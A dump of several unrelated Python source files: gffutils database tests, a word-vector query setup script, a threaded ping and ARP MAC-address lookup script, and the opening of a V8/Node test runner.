iter(iterators._FileIterator(gffutils.example_filename('FBgn0031208.gff'))),
**kwargs
)
db_results = inspect.inspect(
gffutils.create_db(
gffutils.example_filename('FBgn0031208.gff'),
':memory:'),
**kwargs
)
expected = {
'attribute_keys': {
u'Name': 9,
u'Parent': 9,
u'score_text': 2,
u'gbunit': 1,
u'derived_computed_cyto': 1,
u'score': 2,
u'Dbxref': 3,
u'ID': 8,
u'Ontology_term': 1,
},
'feature_count': 10,
'chrom': {u'chr2L': 10},
'strand': {u'+': 10},
'featuretype': {
u'five_prime_UTR': 1,
u'exon': 3,
u'mRNA': 2,
u'CDS': 1,
'intron': 2,
u'gene': 1}
}
assert file_results == db_results == iter_results == expected
def test_delete():
db_fname = gffutils.example_filename("gff_example1.gff3")
# incrementally delete all features
db = gffutils.create_db(db_fname, ':memory:')
ids = [i.id for i in db.all_features()]
current = set(ids)
for _id in ids:
db.delete(_id)
expected = current.difference([_id])
current = set([i.id for i in db.all_features()])
assert current == expected, (current, expected)
assert len(current) == 0
# same thing, but as a list of Feature objects rather than string IDs
db = gffutils.create_db(db_fname, ':memory:')
features = list(db.all_features())
current = set(features)
for feature in features:
db.delete(feature)
expected = current.difference([feature])
current = set(list(db.all_features()))
assert current == expected, (current, expected)
assert len(current) == 0, current
# same thing, but use a FeatureDB.
db1 = gffutils.create_db(db_fname, ':memory:')
db2 = gffutils.create_db(db_fname, ':memory:')
db1.delete(db2)
assert len(list(db1.all_features())) == 0
db = gffutils.create_db(db_fname, ':memory:')
db.delete('nonexistent')
def test_iterator_update():
db_fname = gffutils.example_filename("gff_example1.gff3")
db = gffutils.create_db(db_fname, ':memory:')
assert len(list(db.all_features())) == 12
orig_exon_coords = set([(i.start, i.stop) for i in db.features_of_type('exon')])
# reset all features to have the same coords of start=1, stop=100
def gen():
for i in db.features_of_type('gene'):
i.start = 1
i.stop = 100
yield i
db.update(gen(), merge_strategy='replace')
assert len(list(db.all_features())) == 12
assert len(list(db.features_of_type('gene'))) == 1
g = six.next(db.features_of_type('gene'))
assert g.start == 1, g.start
assert g.stop == 100, g.stop
# exons should have remained unchanged.
assert orig_exon_coords == set([(i.start, i.stop) for i in db.features_of_type('exon')])
def _transform(f):
f.start = 1
f.stop = 100
return f
db_fname = gffutils.example_filename("gff_example1.gff3")
db = gffutils.create_db(db_fname, ':memory:')
db.update(db.features_of_type('gene'), merge_strategy='replace', transform=_transform)
assert len(list(db.all_features())) == 12
assert len(list(db.features_of_type('gene'))) == 1
g = six.next(db.features_of_type('gene'))
assert g.start == 1, g.start
assert g.stop == 100, g.stop
# exons should have remained unchanged.
assert orig_exon_coords == set([(i.start, i.stop) for i in db.features_of_type('exon')])
def test_tempfiles():
# specifiy a writeable temp dir for testing
tempdir = '/tmp/gffutils-test'
def clean_tempdir():
tempfile.tempdir = tempdir
if os.path.exists(tempdir):
shutil.rmtree(tempdir)
os.makedirs(tempdir)
clean_tempdir()
# default keep_tempfiles=False should give us nothing.
db = gffutils.create_db(
gffutils.example_filename('FBgn0031208.gtf'), ':memory:')
assert len(os.listdir(tempdir)) == 0
# adding keep_tempfiles=True should give us 1 tempfile for gtf...
db = gffutils.create_db(
gffutils.example_filename('FBgn0031208.gtf'), ':memory:', _keep_tempfiles=True)
filelist = os.listdir(tempdir)
assert len(filelist) == 1, filelist
assert filelist[0].endswith('.gffutils')
#...and another one for gff. This time, make sure the suffix
db = gffutils.create_db(
gffutils.example_filename('FBgn0031208.gff'), ':memory:', _keep_tempfiles=True)
filelist = os.listdir(tempdir)
assert len(filelist) == 2, filelist
for i in filelist:
assert i.endswith('.gffutils')
# OK, now delete what we have so far...
clean_tempdir()
# Make sure that works for custom suffixes
db = gffutils.create_db(
gffutils.example_filename('FBgn0031208.gtf'), ':memory:', _keep_tempfiles='.GTFtmp')
filelist = os.listdir(tempdir)
assert len(filelist) == 1, filelist
assert filelist[0].endswith('.GTFtmp')
clean_tempdir()
db = gffutils.create_db(
gffutils.example_filename('FBgn0031208.gtf'), ':memory:', _keep_tempfiles='.GFFtmp')
filelist = os.listdir(tempdir)
assert len(filelist) == 1, filelist
assert filelist[0].endswith('.GFFtmp')
# Test n parallel instances of gffutils across PROCESSES processes.
#
# Note that travis-ci doesn't like it when you use multiple cores, so the
# .travis.yml file sets this to 1. This also means that
# 1) `n` shouldn't be too large because travis-ci will run one at a time,
# but more importantly,
# 2) this will only truly test parallel processes on a local machine with
# multiple cpus.
clean_tempdir()
# .travis.yml sets the PROCESSES env var; otherwise use all available.
PROCESSES = int(os.environ.get("PROCESSES", multiprocessing.cpu_count()))
pool = multiprocessing.Pool(PROCESSES)
n = 100
res = pool.map(make_db, range(n))
assert sorted(list(res)) == list(range(n))
filelist = os.listdir(tempdir)
assert len(filelist) == n, len(filelist)
expected = dedent("""\
FBtr0300689 chr2L 7529 9484 + transcript 4681 {"transcript_id":["FBtr0300689"],"gene_id":["FBgn0031208"]}
FBgn0031208 chr2L 7529 9484 + gene 4681 {"gene_id":["FBgn0031208"]}
FBtr0300690 chr2L 7529 9484 + transcript 4681 {"transcript_id":["FBtr0300690"],"gene_id":["FBgn0031208"]}
transcript_Fk_gene_1 chr2L 10000 11000 - transcript 4681 {"transcript_id":["transcript_Fk_gene_1"],"gene_id":["Fk_gene_1"]}
Fk_gene_1 chr2L 10000 11000 - gene 4681 {"gene_id":["Fk_gene_1"]}
transcript_Fk_gene_2 chr2L 11500 12500 - transcript 4681 {"transcript_id":["transcript_Fk_gene_2"],"gene_id":["Fk_gene_2"]}
Fk_gene_2 chr2L 11500 12500 - gene 4681 {"gene_id":["Fk_gene_2"]}
""")
def matches_expected(fn):
"""
Python 3 has unpredictable dictionary ordering. This function checks
the *semantic* similarity of lines by parsing the attributes into
a dictonary.
"""
exp_features = expected.splitlines(True)
new_features = list(open(fn))
assert len(exp_features) == len(new_features)
for expline, newline in zip(exp_features, new_features):
exp_toks = expline.split()
new_toks = newline.split()
assert exp_toks[:-1] == new_toks[:-1]
assert json.loads(exp_toks[-1]) == json.loads(new_toks[-1])
# make sure that each of the `n` files matches the expected output.
for fn in filelist:
fn = os.path.join(tempdir, fn)
try:
matches_expected(fn)
except AssertionError:
print(''.join(difflib.ndiff(expected.splitlines(True), this.splitlines(True))))
raise
clean_tempdir()
def test_disable_infer():
"""
tests the new semantics for disabling gene/transcript inference
"""
# To start, we construct a GTF db by inferring genes and transcripts
db = gffutils.create_db(gffutils.example_filename('FBgn0031208.gtf'), ':memory:')
# Then create a file missing transcripts, and another missing genes.
import tempfile
tempfile.tempdir = None
no_transcripts = open(tempfile.NamedTemporaryFile(delete=False).name, 'w')
no_genes = open(tempfile.NamedTemporaryFile(delete=False).name, 'w')
for feature in db.all_features():
if feature.featuretype != 'transcript':
no_transcripts.write(str(feature) + '\n')
if feature.featuretype != 'gene':
no_genes.write(str(feature) + '\n')
no_genes.close()
no_transcripts.close()
no_tx_db = gffutils.create_db(no_transcripts.name, ':memory:', disable_infer_transcripts=True)
no_gn_db = gffutils.create_db(no_genes.name, ':memory:', disable_infer_genes=True)
no_xx_db = gffutils.create_db(
gffutils.example_filename('FBgn0031208.gtf'),
':memory:',
disable_infer_genes=True,
disable_infer_transcripts=True
)
# no transcripts but 3 genes
assert len(list(no_tx_db.features_of_type('transcript'))) == 0
assert len(list(no_tx_db.features_of_type('gene'))) == 3
# no genes but 4 transcripts
assert len(list(no_gn_db.features_of_type('gene'))) == 0
assert len(list(no_gn_db.features_of_type('transcript'))) == 4
# no genes or transcripts
assert len(list(no_xx_db.features_of_type('gene'))) == 0
assert len(list(no_xx_db.features_of_type('transcript'))) == 0
def test_deprecation_handler():
return
# TODO: when infer_gene_extent actually gets deprecated, test here.
assert_raises(ValueError, gffutils.create_db,
gffutils.example_filename('FBgn0031208.gtf'),
':memory:',
infer_gene_extent=False)
def test_nonsense_kwarg():
assert_raises(TypeError,
gffutils.create_db,
gffutils.example_filename('FBgn0031208.gtf'),
":memory:",
asdf=True)
def test_infer_gene_extent():
# Before we deprecate this, make sure it still works but emits a warning.
with warnings.catch_warnings(record=True) as w:
gffutils.create_db(
gffutils.example_filename('FBgn0031208.gtf'),
':memory:',
infer_gene_extent=False)
assert len(w) == 1
# From #79
def test_issue_79():
gtf = gffutils.example_filename('keep-order-test.gtf')
db = gffutils.create_db(gtf, 'tmp.db',
disable_infer_genes=False,
disable_infer_transcripts=False,
id_spec={"gene": "gene_id", "transcript": "transcript_id"},
merge_strategy="create_unique",
keep_order=True,
force=True)
exp = open(gtf).read()
obs = '\n'.join([str(i) for i in db.all_features()])
exp_1 = exp.splitlines(True)[0].strip()
obs_1 = obs.splitlines(True)[0].strip()
print('EXP')
print(exp_1)
print('OBS')
print(obs_1)
print('DIFF')
print(''.join(difflib.ndiff([exp_1], [obs_1])))
assert obs_1 == exp_1
def test_for_analyze():
db = gffutils.create_db(
gffutils.example_filename('FBgn0031208.gtf'),
'deleteme',
force=True
)
assert db._analyzed()
db.execute('DROP TABLE sqlite_stat1')
assert not db._analyzed()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
db2 = gffutils.FeatureDB('deleteme')
assert len(w) == 1
assert "analyze" in str(w[-1].message)
db.analyze()
assert db._analyzed()
os.unlink('deleteme')
def test_issue_82():
# key-val separator is inside an unquoted attribute value
x = (
'Spenn-ch12\tsgn_markers\tmatch\t2621812\t2622049\t.\t+\t.\t'
'Alias=SGN-M1347;ID=T0028;Note=marker name(s): T0028 SGN-M1347 |identity=99.58|escore=2e-126'
)
y = feature.feature_from_line(x)
assert y.attributes['Note'] == ['marker name(s): T0028 SGN-M1347 |identity=99.58|escore=2e-126']
gffutils.create_db(gffutils.example_filename('keyval_sep_in_attrs.gff'), ':memory:')
def test_sequence():
fasta = gffutils.example_filename('dm6-chr2L.fa')
f = feature.feature_from_line(
'chr2L FlyBase gene 154 170 . + . ID=one;')
seq = f.sequence(fasta)
assert seq == 'aCGAGATGATAATATAT'
assert len(seq) == len(f)
f.strand = '-'
seq = f.sequence(fasta)
assert seq == 'ATATATTATCATCTCGt'
assert len(seq) == len(f)
def test_issue_85():
# when start or stop was empty, #85 would fail Should now work with
# blank fields
f = feature.feature_from_line('\t'.join([''] * 9))
# or with "." placeholders
f = feature.feature_from_line('\t'.join(['.'] * 9))
def test_unquoting():
# incoming is encoded
s = (
'chr1\tAUGUSTUS\tgene\t6950084\t6951407\t0.26\t-\t.\t'
'ID=INIL01g00009;GeneSymbol=Ndufaf6;Note=NADH dehydrogenase '
'(ubiquinone) complex I%2C assembly factor 6;GO_Terms=GO:0005743|'
'GO:0016740|GO:0009058|GO:0032981;PFam=PF00494'
)
f = feature.feature_from_line(s, keep_order=True)
# string representation should be identical
assert str(f) == s
# accessing attribute should be decoded
n = f['Note']
assert n == ['NADH dehydrogenase (ubiquinone) complex I, assembly factor 6']
def test_unreasonable_unquoting():
s = (
'chr1\t.\t.\t1\t2\t0.26\t-\t.\t'
'newline=%0A;'
'percent=%25;'
'null=%00;'
'comma=%2C;'
# The first parent is "A," (A with a comma), the second is "B%"
'Parent=A%2C,B%25,C;'
)
f = feature.feature_from_line(s, keep_order=True)
assert f.attributes['newline'][0] == '\n'
assert f.attributes['percent'][0] == '%'
assert f.attributes['null'][0] == '\x00'
assert f.attributes['comma'][0] == ','
# Commas indicate
assert f.attributes['Parent'] == ['A,', 'B%', 'C']
assert str(f) == s
def test_unquoting_iter():
s = 'chr1\t.\tgene\t1\t2\t.\t-\t.\tID=%2C;'
tmp = tempfile.NamedTemporaryFile(delete=False).name
with open(tmp, 'w') as fout:
fout.write(s + '\n')
assert list(gffutils.iterators.DataIterator(tmp))[0]['ID'][0] == ','
def test_db_unquoting():
s = dedent(
'''
chr1\t.\tgene\t1\t2\t.\t-\t.\tID=a;Note=%2C;
chr1\t.\tgene\t1\t2\t.\t-\t.\tID=b;Note=%2C;
chr1\t.\tgene\t1\t2\t.\t-\t.\tID=c;Note=%2C;
chr1\t.\tgene\t1\t2\t.\t-\t.\tID=d;Note=%2C;
chr1\t.\tgene\t1\t2\t.\t-\t.\tID=e;Note=%2C;
chr1\t.\tgene\t1\t2\t.\t-\t.\tID=f;Note=%2C;
''')
tmp = tempfile.NamedTemporaryFile(delete=False).name
with open(tmp, 'w') as fout:
fout.write(s + '\n')
db = gffutils.create_db(tmp, ':memory:', checklines=1)
assert db['a']['Note'] == [',']
assert db['b']['Note'] == [',']
assert db['c']['Note'] == [',']
assert db['d']['Note'] == [',']
assert db['e']['Note'] == [',']
assert db['f']['Note'] == [',']
def test_issue_105():
fn = gffutils.example_filename('FBgn0031208.gtf')
home = os.path.expanduser('~')
newfn = os.path.join(home, '.gffutils.test')
with open(newfn, 'w') as fout:
fout.write(open(fn).read())
f = gffutils.iterators.DataIterator(newfn)
for i in f:
pass
os.unlink(newfn)
def test_issue_107():
s = dedent(
'''
chr1\t.\tgene\t10\t15\t.\t+\t.\tID=b;
chr1\t.\tgene\t1\t5\t.\t-\t.\tID=a;
chr2\t.\tgene\t25\t50\t.\t-\t.\tID=c;
chr2\t.\tgene\t55\t60\t.\t-\t.\tID=d;
''')
tmp = tempfile.NamedTemporaryFile(delete=False).name
with open(tmp, 'w') as fout:
fout.write(s + '\n')
db = gffutils.create_db(tmp, ':memory:')
interfeatures = list(db.interfeatures(
db.features_of_type('gene', order_by=('seqid', 'start'))))
assert [str(i) for i in interfeatures] == [
'chr1\tgffutils_derived\tinter_gene_gene\t6\t9\t.\t.\t.\tID=a,b;',
'chr2\tgffutils_derived\tinter_gene_gene\t16\t54\t.\t-\t.\tID=c,d;',
]
def test_issue_119():
# First file has these two exons with no ID:
#
# chr2L FlyBase exon 8193 8589 . + . Parent=FBtr0300690
# chr2L FlyBase exon 7529 8116 . + . Name=CG11023:1;Parent=FBtr0300689,FBtr0300690
#
db0 = gffutils.create_db(gffutils.example_filename('FBgn0031208.gff'),':memory:')
# And this one, a bunch of reads with no IDs anywhere
db1 = gffutils.create_db(gffutils.example_filename('F3-unique-3.v2.gff'),':memory:')
# When db1 is updated by db0
db2 = db1.update(db0)
assert (
db2._autoincrements
== db1._autoincrements
== {'exon': 2, 'read': 112}
), db2._autoincrements
assert len(list(db0.features_of_type('exon'))) == 6
# Now we update that with db0 again
db3 = db2.update(db0, merge_strategy='replace')
# Using the "replace" strategy, we should have only gotten another 2 exons
assert len(list(db3.features_of_type('exon'))) == 8
# Make sure that the autoincrements for exons jumped by 2
assert (
db2._autoincrements
== db3._autoincrements
== {'exon': 4, 'read': 112}
), db2._autoincrements
# More isolated test, merging two databases each created from the same file
# which itself contains only a single feature with no ID.
tmp = tempfile.NamedTemporaryFile(delete=False).name
with open(tmp, 'w') as fout:
fout.write('chr1\t.\tgene\t10\t15\t.\t+\t.\t\n')
db4 = gffutils.create_db(tmp, tmp + '.db')
db5 = gffutils.create_db(tmp, ':memory:')
assert db4._autoincrements == {'gene': 1}
assert db5._autoincrements == {'gene': 1}
db6 = db4.update(db5)
db7 = gffutils.FeatureDB(db4.dbfn)
# both db4 and db6 should now have the same, updated autoincrements because
# they both point to the same db.
assert db6._autoincrements == db4._autoincrements == {'gene': 2}
# But db5 was created independently and should have unchanged autoincrements
assert db5._autoincrements == {'gene': 1}
# db7 was created from the database pointed to by both db4 and db6. This
# tests that when a FeatureDB is created it should have the
# correctly-updated autoincrements read from the db
assert db7._autoincrements == {'gene': 2}
def test_pr_131():
db = gffutils.create_db(gffutils.example_filename('FBgn0031208.gff'),':memory:')
# previously would raise ValueError("No lines parsed -- was an empty
# file provided?"); now just does nothing
db2 = db.update([])
def test_pr_133():
# Previously, merge_attributes would not deep-copy the values from the
# second dict, and when the values are then modified, the second dict is
# unintentionally modified.
d1 = {'a': [1]}
d2 = {'a': [2]}
d1a = {'a': [1]}
d2a = {'a': [2]}
d3 = gffutils.helpers.merge_attributes(d1, d2)
assert d1 == d1a, d1
assert d2 == d2a, d2
def test_pr_139():
db = gffutils.create_db(gffutils.example_filename('FBgn0031208.gff'),':memory:')
exons = list(db.features_of_type('exon'))
inter = list(db.interfeatures(exons))
# previously, the first exon's attributes would show up in subsequent merged features
assert exons[0].attributes['Name'][0] not in inter[1].attributes['Name']
assert exons[0].attributes['Name'][0] not in inter[2].attributes['Name']
assert exons[0].attributes['Name'][0] not in inter[3].attributes['Name']
def test_pr_144():
# previously this would fail with:
# UnboundLocalError: local variable 'part' referenced before assignment
f = gffutils.Feature(attributes={'a': ['']})
# Make sure everything got converted correctly
assert f.attributes['a'] == ['']
assert str(f) == ". . . . . . . . a"
g = gffutils.feature.feature_from_line(str(f))
assert g == f
if __name__ == "__main__":
# this test case fails
#test_attributes_modify()
#test_sanitize_gff()
#test_random_chr()
#test_nonascii()
test_iterator_update()
|
setupqueries4years.py
|
from multiprocessing import Queue, Process
from argparse import ArgumentParser
import ioutils
"""
setup queries file to be used in printing word vectors for years
"""
SAVE_FILE = "{year:d}-query.txt"
FULL_RANGE_SAVE_FILE = "{year1:d}-{year2:d}-query.txt"
def worker(proc_num, queue, out_dir, target_lists):
while True:
if queue.empty():
break
year = queue.get()
print proc_num, "Setting queries for year ..", year
with open(out_dir + SAVE_FILE.format(year=year), "w") as fp:
for word in target_lists[year]:
print >>fp, word.encode("utf-8")
def run_parallel(workers, years, out_dir, target_lists):
queue = Queue()
for year in years:
queue.put(year)
procs = [Process(target=worker, args=[i, queue, out_dir, target_lists]) for i in range(workers)]
for p in procs:
p.start()
for p in procs:
p.join()
full_word_set = set([])
for year_words in target_lists.itervalues():
full_word_set = full_word_set.union(set(year_words))
with open(out_dir + FULL_RANGE_SAVE_FILE.format(year1=years[0], year2=years[-1]), "w") as fp:
for word in full_word_set:
print >>fp, word.encode("utf-8")
if __name__ == "__main__":
parser = ArgumentParser("Setup queries file given range of years and word-list contains target words")
parser.add_argument("out_dir", help="output path")
parser.add_argument("word_file", help="path to sorted word file (target word list)")
parser.add_argument("--workers", type=int, help="Number of processes to spawn", default=20)
parser.add_argument("--target-words", type=int, help="Number of words (of decreasing average frequency) to analyze", default=-1)
parser.add_argument("--start-year", type=int, help="start year (inclusive)", default=1800)
parser.add_argument("--end-year", type=int, help="end year (inclusive)", default=1990)
parser.add_argument("--year-inc", type=int, help="year increment", default=10)
args = parser.parse_args()
years = range(args.start_year, args.end_year + 1, args.year_inc)
target_lists, context_lists = ioutils.load_target_context_words(years, args.word_file, args.target_words, -1)
ioutils.mkdir(args.out_dir)
run_parallel(args.workers, years, args.out_dir + "/", target_lists)
|
ping_thread_arp.py
|
#!/usr/bin/env python
from threading import Thread
import subprocess
from queue import Queue
import re
num_ping_threads = 3
num_arp_threads = 3
in_queue = Queue()
out_queue = Queue()
ips = ["10.0.1.1", "10.0.1.3", "10.0.1.11", "10.0.1.51"]
def pinger(i, iq, oq):
"""Pings subnet"""
while True:
ip = iq.get()
print("Thread %s: Pinging %s" % (i, ip))
ret = subprocess.call("ping -c 1 %s" % ip,
shell=True,
stdout=open('/dev/null', 'w'),
stderr=subprocess.STDOUT)
if ret == 0:
#print "%s: is alive" % ip
#place valid ip address in next queue
oq.put(ip)
else:
print("%s: did not respond" % ip)
iq.task_done()
def arping(i, oq):
"""grabs a valid IP address from a queue and gets macaddr"""
while True:
ip = oq.get()
print("Thread %s: Pinging %s" % (i, ip))
p = subprocess.Popen("arping -c 1 %s" % ip,
shell=True,
stdout=subprocess.PIPE)
out = p.stdout.read()
#match and extract mac address from stdout
result = out.split()
pattern = re.compile(":")
macaddr = None
for item in result:
if re.search(pattern, item):
macaddr = item
print("IP Address: %s | Mac Address: %s " % (ip, macaddr))
oq.task_done()
#Place ip addresses into in queue
for ip in ips:
in_queue.put(ip)
#spawn pool of ping threads
for i in range(num_ping_threads):
worker = Thread(target=pinger, args=(i, in_queue, out_queue))
worker.setDaemon(True)
worker.start()
#spawn pool of arping threads
for i in range(num_arp_threads):
worker = Thread(target=arping, args=(i, out_queue))
worker.setDaemon(True)
worker.start()
print("Main Thread Waiting")
#ensures that program does not exit until both queues have been emptied
in_queue.join()
out_queue.join()
print("Done")
#多队列多线程池,ping ip地址并反查出mac
#遍历地址表,遍历线程1,遍历线程2,双阻塞
|
test.py
|
#!/usr/bin/env python
#
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import optparse
import os
from os.path import join, dirname, abspath, basename, isdir, exists
import platform
import re
import signal
import subprocess
import sys
import tempfile
import time
import threading
from Queue import Queue, Empty
sys.path.append(dirname(__file__) + "/../deps/v8/tools");
import utils
VERBOSE = False
# ---------------------------------------------
# --- P r o g r e s s I n d i c a t o r s ---
# ---------------------------------------------
class ProgressIndicator(object):
def __init__(self, cases):
self.cases = cases
self.queue = Queue(len(cases))
for case in cases:
self.queue.put_nowait(case)
self.succeeded = 0
self.remaining = len(cases)
self.total = len(cases)
self.failed = [ ]
self.crashed = 0
self.terminate = False
self.lock = threading.Lock()
def PrintFailureHeader(self, test):
if test.IsNegative():
negative_marker = '[negative] '
else:
negative_marker = ''
print "=== %(label)s %(negative)s===" % {
'label': test.GetLabel(),
'negative': negative_marker
}
print "Path: %s" % "/".join(test.path)
def Run(self, tasks):
self.Starting()
threads = []
# Spawn N-1 threads and then use this thread as the last one.
# That way -j1 avoids threading altogether which is a nice fallback
# in case of threading problems.
for i in xrange(tasks - 1):
thread = threading.Thread(target=self.RunSingle, args=[])
threads.append(thread)
thread.start()
try:
self.RunSingle()
# Wait for the remaining threads
for thread in threads:
# Use a timeout so that signals (ctrl-c) will be processed.
thread.join(timeout=10000000)
except Exception, e:
# If there's an exception we schedule an interruption for any
# remaining threads.
self.terminate = True
# ...and then reraise the exception to bail out
raise
self.Done()
return not self.failed
def RunSingle(self):
while not self.terminate:
try:
test = self.queue.get_nowait()
except Empty:
return
case = test.case
self.lock.acquire()
self.AboutToRun(case)
self.lock.release()
try:
start = time.time()
output = case.Run()
case.duration = (time.time() - start)
except IOError, e:
assert self.terminate
return
if self.terminate:
return
self.lock.acquire()
if output.UnexpectedOutput():
self.failed.append(output)
if output.HasCrashed():
self.crashed += 1
else:
self.succeeded += 1
self.remaining -= 1
self.HasRun(output)
self.lock.release()
def EscapeCommand(command):
parts = []
for part in command:
if ' ' in part:
# Escape spaces. We may need to escape more characters for this
# to work properly.
parts.append('"%s"' % part)
else:
parts.append(part)
return " ".join(parts)
class SimpleProgressIndicator(ProgressIndicator):
def Starting(self):
print 'Running %i tests' % len(self.cases)
def Done(self):
print
for failed in self.failed:
self.PrintFailureHeader(failed.test)
if failed.output.stderr:
print "--- stderr ---"
print failed.output.stderr.strip()
if failed.output.stdout:
print "--- stdout ---"
print failed.output.stdout.strip()
print "Command: %s" % EscapeCommand(failed.command)
if failed.HasCrashed():
print "--- CRASHED ---"
if failed.HasTimedOut():
print "--- TIMEOUT ---"
if len(self.failed) == 0:
print "==="
print "=== All tests succeeded"
print "==="
else:
print
print "==="
print "=== %i tests failed" % len(self.failed)
if self.crashed > 0:
print "=== %i tests CRASHED" % self.crashed
print "==="
class VerboseProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
print 'Starting %s...' % case.GetLabel()
sys.stdout.flush()
def HasRun(self, output):
if output.UnexpectedOutput():
if output.HasCrashed():
outcome = 'CRASH'
else:
outcome = 'FAIL'
else:
outcome = 'pass'
print 'Done running %s: %s' % (output.test.GetLabel(), outcome)
class DotsProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
pass
def HasRun(self, output):
total = self.succeeded + len(self.failed)
if (total > 1) and (total % 50 == 1):
sys.stdout.write('\n')
if output.UnexpectedOutput():
if output.HasCrashed():
sys.stdout.write('C')
sys.stdout.flush()
elif output.HasTimedOut():
sys.stdout.write('T')
sys.stdout.flush()
else:
sys.stdout.write('F')
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
class CompactProgressIndicator(ProgressIndicator):
def __init__(self, cases, templates):
super(CompactProgressIndicator, self).__init__(cases)
self.templates = templates
self.last_status_length = 0
self.start_time = time.time()
def Starting(self):
pass
def Done(self):
self.PrintProgress('Done')
def AboutToRun(self, case):
self.PrintProgress(case.GetLabel())
def HasRun(self, output):
if output.UnexpectedOutput():
self.ClearLine(self.last_status_length)
self.PrintFailureHeader(output.test)
stdout = output.output.stdout.strip()
if len(stdout):
print self.templates['stdout'] % stdout
stderr = output.output.stderr.strip()
if len(stderr):
print self.templates['stderr'] % stderr
print "Command: %s" % EscapeCommand(output.command)
if output.HasCrashed():
print "--- CRASHED ---"
if output.HasTimedOut():
print "--- TIMEOUT ---"
def Truncate(self, str, length):
if length and (len(str) > (length - 3)):
return str[:(length-3)] + "..."
else:
return str
def PrintProgress(self, name):
self.ClearLine(self.last_status_length)
elapsed = time.time() - self.start_time
status = self.templates['status_line'] % {
'passed': self.succeeded,
'remaining': (((self.total - self.remaining) * 100) // self.total),
'failed': len(self.failed),
'test': name,
'mins': int(elapsed) / 60,
'secs': int(elapsed) % 60
}
status = self.Truncate(status, 78)
self.last_status_length = len(status)
print status,
sys.stdout.flush()
class ColorProgressIndicator(CompactProgressIndicator):
def __init__(self, cases):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s",
'stdout': "\033[1m%s\033[0m",
'stderr': "\033[31m%s\033[0m",
}
super(ColorProgressIndicator, self).__init__(cases, templates)
def ClearLine(self, last_line_length):
print "\033[1K\r",
class MonochromeProgressIndicator(CompactProgressIndicator):
def __init__(self, cases):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s",
'stdout': '%s',
'stderr': '%s',
'clear': lambda last_line_length: ("\r" + (" " * last_line_length) + "\r"),
'max_length': 78
}
super(MonochromeProgressIndicator, self).__init__(cases, templates)
def ClearLine(self, last_line_length):
print ("\r" + (" " * last_line_length) + "\r"),
PROGRESS_INDICATORS = {
'verbose': VerboseProgressIndicator,
'dots': DotsProgressIndicator,
'color': ColorProgressIndicator,
'mono': MonochromeProgressIndicator
}
# -------------------------
# --- F r a m e w o r k ---
# -------------------------
class CommandOutput(object):
def __init__(self, exit_code, timed_out, stdout, stderr):
self.exit_code = exit_code
self.timed_out = timed_out
self.stdout = stdout
self.stderr = stderr
self.failed = None
class TestCase(object):
def __init__(self, context, path, mode):
self.path = path
self.context = context
self.duration = None
self.mode = mode
def IsNegative(self):
return False
def CompareTime(self, other):
return cmp(other.duration, self.duration)
def DidFail(self, output):
if output.failed is None:
output.failed = self.IsFailureOutput(output)
return output.failed
def IsFailureOutput(self, output):
return output.exit_code != 0
def GetSource(self):
return "(no source available)"
def RunCommand(self, command):
full_command = self.context.processor(command)
output = Execute(full_command,
self.context,
self.context.GetTimeout(self.mode))
self.Cleanup()
return TestOutput(self,
full_command,
output,
self.context.store_unexpected_output)
def BeforeRun(self):
pass
def AfterRun(self, result):
pass
def Run(self):
self.BeforeRun()
try:
result = self.RunCommand(self.GetCommand())
finally:
self.AfterRun(result)
return result
def Cleanup(self):
return
class TestOutput(object):
def __init__(self, test, command, output, store_unexpected_output):
self.test = test
self.command = command
self.output = output
self.store_unexpected_output = store_unexpected_output
def UnexpectedOutput(self):
if self.HasCrashed():
outcome = CRASH
elif self.HasTimedOut():
outcome = TIMEOUT
elif self.HasFailed():
outcome = FAIL
else:
outcome = PASS
return not outcome in self.test.outcomes
def HasPreciousOutput(self):
return self.UnexpectedOutput() and self.store_unexpected_output
def HasCrashed(self):
if utils.IsWindows():
return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code)
else:
# Timed out tests will have exit_code -signal.SIGTERM.
if self.output.timed_out:
return False
return self.output.exit_code < 0 and \
self.output.exit_code != -signal.SIGABRT
def HasTimedOut(self):
return self.output.timed_out;
def HasFailed(self):
execution_failed = self.test.DidFail(self.output)
if self.test.IsNegative():
return not execution_failed
else:
return execution_failed
def KillProcessWithID(pid):
if utils.IsWindows():
os.popen('taskkill /T /F /PID %d' % pid)
else:
os.kill(pid, signal.SIGTERM)
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.0001
SLEEP_TIME_FACTOR = 1.25
SEM_INVALID_VALUE = -1
